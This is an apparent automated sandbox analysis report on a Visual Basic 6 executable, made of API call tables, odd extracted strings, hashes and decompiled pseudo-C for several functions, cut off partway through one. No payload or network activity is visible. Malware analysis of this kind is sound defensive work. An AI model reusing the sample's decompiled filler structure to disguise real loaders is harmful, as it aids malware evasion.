__vbaStrCmp.MSVBVM60(0040DEC4,00000000,0040DEE0,00000001,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410BC0
__vbaFreeStr.MSVBVM60(0040DEC4,00000000,0040DEE0,00000001,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410BD4
__vbaVarDup.MSVBVM60(0040DEC4,00000000), ref: 00410BF5
#600.MSVBVM60(00000000,00000002), ref: 00410C00
__vbaFreeVar.MSVBVM60(00000000,00000002), ref: 00410C0B
__vbaNew2.MSVBVM60(0040DA28,0041331C,0040DEC4,00000000,0040DEE0,00000001,0040DAE0,00000000,0040DEC4,?,?,?,?,00401486), ref: 00410C23
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000014), ref: 00410C67
__vbaChkstk.MSVBVM60(00000000,?,0040DA18,00000014), ref: 00410C8C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA38,0000013C), ref: 00410CC8
__vbaFreeObj.MSVBVM60(00000000,?,0040DA38,0000013C), ref: 00410CD9
__vbaFreeObj.MSVBVM60(00410D08), ref: 00410D02

Strings

luftkonditioneringen, xrefs: 00410C9A
sindrig, xrefs: 00410B73
Subindices5, xrefs: 00410BE1

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckHresultMove$#517#600#616#716LateNew2
String ID: Subindices5$luftkonditioneringen$sindrig
API String ID: 1911176853-738711162
Opcode ID: 34228266d43decc9d7d85f8e95c736c9a3e57e4b80333ef25bb941cf060b3bac
Instruction ID: 3a25fcdfcb90ce180eda9c2f40d2abca947e4a30e920fef2b1343513162684d3
Opcode Fuzzy Hash: 34228266d43decc9d7d85f8e95c736c9a3e57e4b80333ef25bb941cf060b3bac
Instruction Fuzzy Hash: 92511830D50208ABDF10EFE1C846BEDBBB5AF14704F10452AF401BB1E1DBB95989CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00410F2A, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00410F2A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				char _v56;
				char* _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				signed int _t106;
				char* _t109;
				signed int _t110;
				signed int _t116;
				signed int _t122;
				signed int _t125;
				signed int _t131;
				signed int _t135;
				intOrPtr _t159;

				_push(0x401486);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t159;
				_push(0x78);
				L00401480();
				_v12 = _t159;
				_v8 = 0x401400;
				L00401660();
				_push(1);
				_push( &_v56);
				L00401552();
				_v80 = 0x40db04;
				_v88 = 0x8008;
				_push( &_v56);
				_t106 =  &_v88;
				_push(_t106);
				L00401648();
				_v92 = _t106;
				L00401696();
				if(_v92 != 0) {
					if( *0x41331c != 0) {
						_v116 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v116 = 0x41331c;
					}
					_v92 =  *_v116;
					_t131 =  *((intOrPtr*)( *_v92 + 0x1c))(_v92,  &_v40);
					asm("fclex");
					_v96 = _t131;
					if(_v96 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40da18);
						_push(_v92);
						_push(_v96);
						L004016D8();
						_v120 = _t131;
					}
					_v100 = _v40;
					_t135 =  *((intOrPtr*)( *_v100 + 0x50))(_v100);
					asm("fclex");
					_v104 = _t135;
					if(_v104 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40da78);
						_push(_v100);
						_push(_v104);
						L004016D8();
						_v124 = _t135;
					}
					L004016C0();
				}
				if(0 != 0) {
					_t125 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v92 = _t125;
					if(_v92 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x40d680);
						_push(_a4);
						_push(_v92);
						L004016D8();
						_v128 = _t125;
					}
				}
				_v80 = L"11/11/11";
				_v88 = 8;
				L0040167E();
				_t109 =  &_v56;
				_push(_t109);
				L00401588();
				_v92 =  ~(0 | _t109 != 0x0000ffff);
				L00401696();
				_t110 = _v92;
				if(_t110 != 0) {
					if( *0x41331c != 0) {
						_v132 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v132 = 0x41331c;
					}
					_v92 =  *_v132;
					_t116 =  *((intOrPtr*)( *_v92 + 0x1c))(_v92,  &_v40);
					asm("fclex");
					_v96 = _t116;
					if(_v96 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40da18);
						_push(_v92);
						_push(_v96);
						L004016D8();
						_v136 = _t116;
					}
					_v100 = _v40;
					_v80 = 0x80020004;
					_v88 = 0xa;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t122 =  *((intOrPtr*)( *_v100 + 0x5c))(_v100, 0x10,  &_v36);
					asm("fclex");
					_v104 = _t122;
					if(_v104 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x40da78);
						_push(_v100);
						_push(_v104);
						L004016D8();
						_v140 = _t122;
					}
					_t110 = _v36;
					_v112 = _t110;
					_v36 = _v36 & 0x00000000;
					L0040168A();
					L004016C0();
				}
				_v32 = 0x14a9ee;
				_push(0x4111ee);
				L004016C6();
				L004016C6();
				return _t110;
			}

0x00410f2f
0x00410f3a
0x00410f3b
0x00410f42
0x00410f45
0x00410f4d
0x00410f50
0x00410f5d
0x00410f62
0x00410f67
0x00410f68
0x00410f6d
0x00410f74
0x00410f7e
0x00410f7f
0x00410f82
0x00410f83
0x00410f88
0x00410f8f
0x00410f9a
0x00410fa7
0x00410fc1
0x00410fa9
0x00410fa9
0x00410fae
0x00410fb3
0x00410fb8
0x00410fb8
0x00410fcd
0x00410fdc
0x00410fdf
0x00410fe1
0x00410fe8
0x00411001
0x00410fea
0x00410fea
0x00410fec
0x00410ff1
0x00410ff4
0x00410ff7
0x00410ffc
0x00410ffc
0x00411008
0x00411013
0x00411016
0x00411018
0x0041101f
0x00411038
0x00411021
0x00411021
0x00411023
0x00411028
0x0041102b
0x0041102e
0x00411033
0x00411033
0x0041103f
0x0041103f
0x00411048
0x00411052
0x00411058
0x0041105f
0x0041107b
0x00411061
0x00411061
0x00411066
0x0041106b
0x0041106e
0x00411071
0x00411076
0x00411076
0x0041105f
0x0041107f
0x00411086
0x00411093
0x00411098
0x0041109b
0x0041109c
0x004110ac
0x004110b3
0x004110b8
0x004110be
0x004110cb
0x004110e5
0x004110cd
0x004110cd
0x004110d2
0x004110d7
0x004110dc
0x004110dc
0x004110f1
0x00411100
0x00411103
0x00411105
0x0041110c
0x00411128
0x0041110e
0x0041110e
0x00411110
0x00411115
0x00411118
0x0041111b
0x00411120
0x00411120
0x00411132
0x00411135
0x0041113c
0x0041114a
0x00411154
0x00411155
0x00411156
0x00411157
0x00411160
0x00411163
0x00411165
0x0041116c
0x00411188
0x0041116e
0x0041116e
0x00411170
0x00411175
0x00411178
0x0041117b
0x00411180
0x00411180
0x0041118f
0x00411192
0x00411195
0x0041119f
0x004111a7
0x004111a7
0x004111ac
0x004111b3
0x004111e0
0x004111e8
0x004111ed

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00410F45
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 00410F5D
#526.MSVBVM60(?,00000001,?,?,?,?,00401486), ref: 00410F68
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00410F83
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00410F8F
__vbaNew2.MSVBVM60(0040DA28,0041331C,00008008,?), ref: 00410FB3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,0000001C,?,?,?,?,?,00008008,?), ref: 00410FF7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000050,?,?,?,?,?,00008008,?), ref: 0041102E
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?), ref: 0041103F
__vbaHresultCheckObj.MSVBVM60(?,?,0040D680,00000710), ref: 00411071
__vbaVarDup.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411093
#557.MSVBVM60(?,00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041109C
__vbaFreeVar.MSVBVM60(?,00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004110B3
__vbaNew2.MSVBVM60(0040DA28,0041331C,?,00008008,?), ref: 004110D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,0000001C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041111B
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041114A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,0000005C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041117B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041119F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 004111A7
__vbaFreeStr.MSVBVM60(004111EE,?,00008008,?), ref: 004111E0
__vbaFreeStr.MSVBVM60(004111EE,?,00008008,?), ref: 004111E8

Strings

11/11/11, xrefs: 0041107F

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$#526#557CopyMove
String ID: 11/11/11
API String ID: 2874651639-2767166760
Opcode ID: dcca91161c6c94c0d0827cd42425f47361c79b7ebd198be17e828c93e2f1e5c1
Instruction ID: 168002888100ed9f8186082f31c3d099da300dff1c01d133f77d06ce27498474
Opcode Fuzzy Hash: dcca91161c6c94c0d0827cd42425f47361c79b7ebd198be17e828c93e2f1e5c1
Instruction Fuzzy Hash: 5A81C270D00248AFDF10DFE5C945BEDBBB5AF08305F20442AE505BB2A1DB799A89DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00411209, Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00411209(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* _v44;
				long long _v52;
				char _v60;
				char _v84;
				char _v92;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				signed int _v124;
				signed int _t53;
				signed int _t55;
				signed int _t59;
				char* _t68;
				void* _t76;
				void* _t78;
				intOrPtr* _t79;
				signed int _t81;

				_t79 = _t78 - 0xc;
				 *[fs:0x0] = _t79;
				L00401480();
				_v16 = _t79;
				_v12 = 0x401438;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401486, _t76);
				L00401660();
				L00401660();
				_v84 =  &_v40;
				_v92 = 0x4008;
				_push( &_v92);
				_push( &_v60);
				L0040154C();
				_v100 = 0x40df58;
				_v108 = 0x8008;
				_push( &_v60);
				_t53 =  &_v108;
				_push(_t53);
				L00401648();
				_v112 = _t53;
				L00401696();
				if(_v112 != 0) {
					_push(L"frostiness");
					L00401546();
				}
				_v52 =  *0x401430;
				_v60 = 5;
				_t55 =  &_v60;
				_push(_t55);
				L00401684();
				L0040168A();
				_push(_t55);
				_push(L"Double");
				L00401690();
				asm("sbb eax, eax");
				_v112 =  ~( ~( ~_t55));
				L004016C6();
				_t68 =  &_v60;
				L00401696();
				_t59 = _v112;
				_t81 = _t59;
				if(_t81 != 0) {
					_push(L"LONES");
					_push(0x6b);
					_push(0xffffffff);
					_push(0x20);
					L004015F4();
				}
				asm("fldz");
				L004014EC();
				L0040165A();
				asm("fcomp qword [0x401428]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t81 != 0) {
					L00401540();
					 *_t79 =  *0x40141c;
					 *_t79 =  *0x401418;
					_v84 =  *0x401414;
					 *_t79 =  *0x401410;
					_t59 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t68, _t68, _t68, _t68, _t59);
					asm("fclex");
					_v112 = _t59;
					if(_v112 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x40d650);
						_push(_a4);
						_push(_v112);
						L004016D8();
						_v124 = _t59;
					}
				}
				_v36 = 0x970e1bf0;
				_v32 = 0x5afd;
				asm("wait");
				_push(0x4113dc);
				L004016C6();
				L004016C6();
				return _t59;
			}

0x0041120c
0x0041121b
0x00411225
0x0041122d
0x00411230
0x00411237
0x00411246
0x0041124f
0x0041125c
0x00411264
0x00411267
0x00411271
0x00411275
0x00411276
0x0041127b
0x00411282
0x0041128c
0x0041128d
0x00411290
0x00411291
0x00411296
0x0041129d
0x004112a8
0x004112aa
0x004112af
0x004112af
0x004112ba
0x004112bd
0x004112c4
0x004112c7
0x004112c8
0x004112d2
0x004112d7
0x004112d8
0x004112dd
0x004112e4
0x004112ea
0x004112f1
0x004112f6
0x004112f9
0x004112fe
0x00411302
0x00411304
0x00411306
0x0041130b
0x0041130d
0x0041130f
0x00411311
0x00411311
0x00411316
0x00411318
0x0041131d
0x00411322
0x00411328
0x0041132a
0x0041132b
0x00411333
0x00411340
0x0041134a
0x00411354
0x0041135e
0x0041136b
0x00411371
0x00411373
0x0041137a
0x00411396
0x0041137c
0x0041137c
0x00411381
0x00411386
0x00411389
0x0041138c
0x00411391
0x00411391
0x0041137a
0x0041139a
0x004113a1
0x004113a8
0x004113a9
0x004113ce
0x004113d6
0x004113db

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411225
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 0041124F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 0041125C
#524.MSVBVM60(?,00004008), ref: 00411276
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,00004008), ref: 00411291
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041129D
#531.MSVBVM60(frostiness,00008008,?,?,?,?,00004008), ref: 004112AF
#591.MSVBVM60(00000005,00008008,?,?,?,?,00004008), ref: 004112C8
__vbaStrMove.MSVBVM60(00000005,00008008,?,?,?,?,00004008), ref: 004112D2
__vbaStrCmp.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004112DD
__vbaFreeStr.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004112F1
__vbaFreeVar.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004112F9
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000006B,LONES,Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 00411311
_CIexp.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 00411318
__vbaFpR8.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 0041131D
__vbaFpI4.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 00411333
__vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040D650,000002C8,?,?,?,?,00000000,Double,00000000,00000005,00008008,?), ref: 0041138C
__vbaFreeStr.MSVBVM60(004113DC,Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004113CE
__vbaFreeStr.MSVBVM60(004113DC,Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004113D6

Strings

LONES, xrefs: 00411306
Double, xrefs: 004112D8
frostiness, xrefs: 004112AA

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$#524#531#591CheckChkstkFileHresultIexpMoveOpen
String ID: Double$LONES$frostiness
API String ID: 854741229-3053727711
Opcode ID: 5b06cd6c1d2b0baf6c822e0c66d1c3ba5546d8851e8b979fe2ab874d5a46ad35
Instruction ID: a2cbcc84ba5809c6d660f4cf2ed353fa06c0b9f8a42a8bc0a09119683d895e81
Opcode Fuzzy Hash: 5b06cd6c1d2b0baf6c822e0c66d1c3ba5546d8851e8b979fe2ab874d5a46ad35
Instruction Fuzzy Hash: 90412770900209ABDB00EFE2CC45AEEBBB8AF04704F50863AF545BB1F1DB795585CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00410D27, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00410D27(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v44;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char* _v76;
				intOrPtr _v84;
				signed int _v104;
				signed int _v116;
				signed long long _v120;
				signed int _v124;
				signed short _t69;
				char* _t73;
				signed int _t76;
				char* _t80;
				void* _t94;
				void* _t96;
				long long* _t97;
				intOrPtr* _t98;

				_t97 = _t96 - 0xc;
				 *[fs:0x0] = _t97;
				L00401480();
				_v16 = _t97;
				_v12 = 0x4013f0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401486, _t94);
				L00401660();
				_v44 = 1;
				_v52 = 2;
				_push(0);
				_push( &_v52);
				L004015A0();
				L0040168A();
				_t80 =  &_v52;
				L00401696();
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				_push( &_v68);
				_push( &_v52);
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				L00401654();
				L0040165A();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t21 =  &_v116;
					 *_t21 = _v116 & 0x00000000;
					__eflags =  *_t21;
				} else {
					_v116 = 1;
				}
				_v104 =  ~_v116;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040164E();
				_t98 = _t97 + 0xc;
				if(_v104 != 0) {
					_v120 =  *0x4013e8 *  *0x4013e0;
					 *_t98 = _v120;
					_t76 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t80);
					asm("fclex");
					_v104 = _t76;
					if(_v104 >= 0) {
						_t38 =  &_v124;
						 *_t38 = _v124 & 0x00000000;
						__eflags =  *_t38;
					} else {
						_push(0x84);
						_push(0x40d650);
						_push(_a4);
						_push(_v104);
						L004016D8();
						_v124 = _t76;
					}
				}
				_v44 = 0x64d4;
				_v52 = 2;
				_t69 =  &_v52;
				_push(_t69);
				L0040155E();
				asm("sbb eax, eax");
				_v104 =  ~( ~( ~_t69));
				L00401696();
				_t73 = _v104;
				if(_t73 != 0) {
					_v76 = L"Lgelige";
					_v84 = 8;
					L0040167E();
					_t73 =  &_v52;
					_push(_t73);
					L00401558();
					L0040168A();
					L00401696();
				}
				asm("wait");
				_push(0x410f0b);
				L004016C6();
				L004016C6();
				L004016C6();
				return _t73;
			}

0x00410d2a
0x00410d39
0x00410d43
0x00410d4b
0x00410d4e
0x00410d55
0x00410d64
0x00410d6d
0x00410d72
0x00410d79
0x00410d80
0x00410d85
0x00410d86
0x00410d90
0x00410d95
0x00410d98
0x00410d9d
0x00410da4
0x00410dab
0x00410db2
0x00410dbc
0x00410dc0
0x00410dc1
0x00410dc3
0x00410dc4
0x00410dc5
0x00410dc8
0x00410dca
0x00410dcb
0x00410dcc
0x00410dcf
0x00410dd1
0x00410dd2
0x00410dd3
0x00410dd6
0x00410dd8
0x00410dd9
0x00410dda
0x00410ddd
0x00410de2
0x00410de7
0x00410ded
0x00410def
0x00410df0
0x00410dfb
0x00410dfb
0x00410dfb
0x00410df2
0x00410df2
0x00410df2
0x00410e04
0x00410e0b
0x00410e0f
0x00410e10
0x00410e12
0x00410e17
0x00410e20
0x00410e2e
0x00410e35
0x00410e40
0x00410e46
0x00410e48
0x00410e4f
0x00410e6b
0x00410e6b
0x00410e6b
0x00410e51
0x00410e51
0x00410e56
0x00410e5b
0x00410e5e
0x00410e61
0x00410e66
0x00410e66
0x00410e4f
0x00410e6f
0x00410e76
0x00410e7d
0x00410e80
0x00410e81
0x00410e89
0x00410e8f
0x00410e96
0x00410e9b
0x00410ea1
0x00410ea3
0x00410eaa
0x00410eb7
0x00410ebc
0x00410ebf
0x00410ec0
0x00410eca
0x00410ed2
0x00410ed2
0x00410ed7
0x00410ed8
0x00410ef5
0x00410efd
0x00410f05
0x00410f0a

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00410D43
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 00410D6D
#705.MSVBVM60(00000002,00000000), ref: 00410D86
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 00410D90
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 00410D98
#675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A,?,?,00000002,00000000), ref: 00410DDD
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A,?,?,00000002,00000000), ref: 00410DE2
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00410E12
__vbaHresultCheckObj.MSVBVM60(00000000,004013F0,0040D650,00000084), ref: 00410E61
#592.MSVBVM60(00000002), ref: 00410E81
__vbaFreeVar.MSVBVM60(00000002), ref: 00410E96
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000002), ref: 00410EB7
#667.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 00410EC0
__vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 00410ECA
__vbaFreeVar.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 00410ED2
__vbaFreeStr.MSVBVM60(00410F0B,00000002), ref: 00410EF5
__vbaFreeStr.MSVBVM60(00410F0B,00000002), ref: 00410EFD
__vbaFreeStr.MSVBVM60(00410F0B,00000002), ref: 00410F05

Strings

Lgelige, xrefs: 00410EA3

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#592#667#675#705CheckChkstkCopyHresultList
String ID: Lgelige
API String ID: 2080591275-2071385871
Opcode ID: 7797354ce50df95a96300fd1c7ce62b5e25fab09de1e02f09f7b09627c9020b9
Instruction ID: 73c172f9a3a3b46182a7c244adfdc03977cb019c53e7b443f5fe14d3d32d5531
Opcode Fuzzy Hash: 7797354ce50df95a96300fd1c7ce62b5e25fab09de1e02f09f7b09627c9020b9
Instruction Fuzzy Hash: D8512970910219ABDB00EFA1DC85BEEBBB8FF00704F54452EF401BB2A1DB795945CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004116ED, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004116ED(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v44;
				char _v52;
				short _v72;
				signed int _t32;
				char* _t37;
				void* _t50;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;

				_t55 = __fp0;
				_t53 = _t52 - 0xc;
				 *[fs:0x0] = _t53;
				L00401480();
				_v16 = _t53;
				_v12 = 0x401458;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401486, _t50);
				_push( &_v52);
				L004015DC();
				_push( &_v52);
				L004015E2();
				L0040168A();
				L00401696();
				_v44 = 0x80020004;
				_v52 = 0xa;
				_t32 =  &_v52;
				_push(_t32);
				L0040152E();
				L0040168A();
				_push(_t32);
				_push(L"tiltros");
				L00401690();
				asm("sbb eax, eax");
				_v72 =  ~( ~_t32 + 1);
				L004016C6();
				L00401696();
				if(_v72 != 0) {
					L0040157C();
				}
				_v44 = 0x80020004;
				_v52 = 0xa;
				_t37 =  &_v52;
				_push(_t37);
				L00401528();
				_v32 = _t55;
				L00401696();
				asm("wait");
				_push(0x4117e9);
				L004016C6();
				return _t37;
			}

0x004116ed
0x004116f0
0x004116ff
0x00411709
0x00411711
0x00411714
0x0041171b
0x0041172a
0x00411730
0x00411731
0x00411739
0x0041173a
0x00411744
0x0041174c
0x00411751
0x00411758
0x0041175f
0x00411762
0x00411763
0x0041176d
0x00411772
0x00411773
0x00411778
0x0041177f
0x00411784
0x0041178b
0x00411793
0x0041179e
0x004117a0
0x004117a0
0x004117a5
0x004117ac
0x004117b3
0x004117b6
0x004117b7
0x004117bc
0x004117c2
0x004117c7
0x004117c8
0x004117e3
0x004117e8

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411709
#612.MSVBVM60(?,?,?,?,?,00401486), ref: 00411731
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401486), ref: 0041173A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401486), ref: 00411744
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401486), ref: 0041174C
#646.MSVBVM60(0000000A), ref: 00411763
__vbaStrMove.MSVBVM60(0000000A), ref: 0041176D
__vbaStrCmp.MSVBVM60(tiltros,00000000,0000000A), ref: 00411778
__vbaFreeStr.MSVBVM60(tiltros,00000000,0000000A), ref: 0041178B
__vbaFreeVar.MSVBVM60(tiltros,00000000,0000000A), ref: 00411793
__vbaEnd.MSVBVM60(tiltros,00000000,0000000A), ref: 004117A0
#593.MSVBVM60(0000000A,tiltros,00000000,0000000A), ref: 004117B7
__vbaFreeVar.MSVBVM60(0000000A,tiltros,00000000,0000000A), ref: 004117C2
__vbaFreeStr.MSVBVM60(004117E9,0000000A,tiltros,00000000,0000000A), ref: 004117E3

Strings

tiltros, xrefs: 00411773

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#593#612#646Chkstk
String ID: tiltros
API String ID: 2731471570-1848849283
Opcode ID: 26dd175b60bda5f138dcda72ebf89bcadf769969b8230b746ccd0ca414437e0f
Instruction ID: 54397e17a84f87db847557801d9e71f403c5767b334ee16786c192e386c50051
Opcode Fuzzy Hash: 26dd175b60bda5f138dcda72ebf89bcadf769969b8230b746ccd0ca414437e0f
Instruction Fuzzy Hash: C821F871A10219ABCB00EBE1DD86EEDBBB8BF04708F54452EF502B71E1EB399505CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00411409, Relevance: 25.7, APIs: 17, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00411409(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				char _v36;
				char _v52;
				char _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				void* _t97;
				signed int _t102;
				signed int _t105;
				signed int _t111;
				signed int _t117;
				signed int _t123;
				signed int _t128;
				void* _t140;
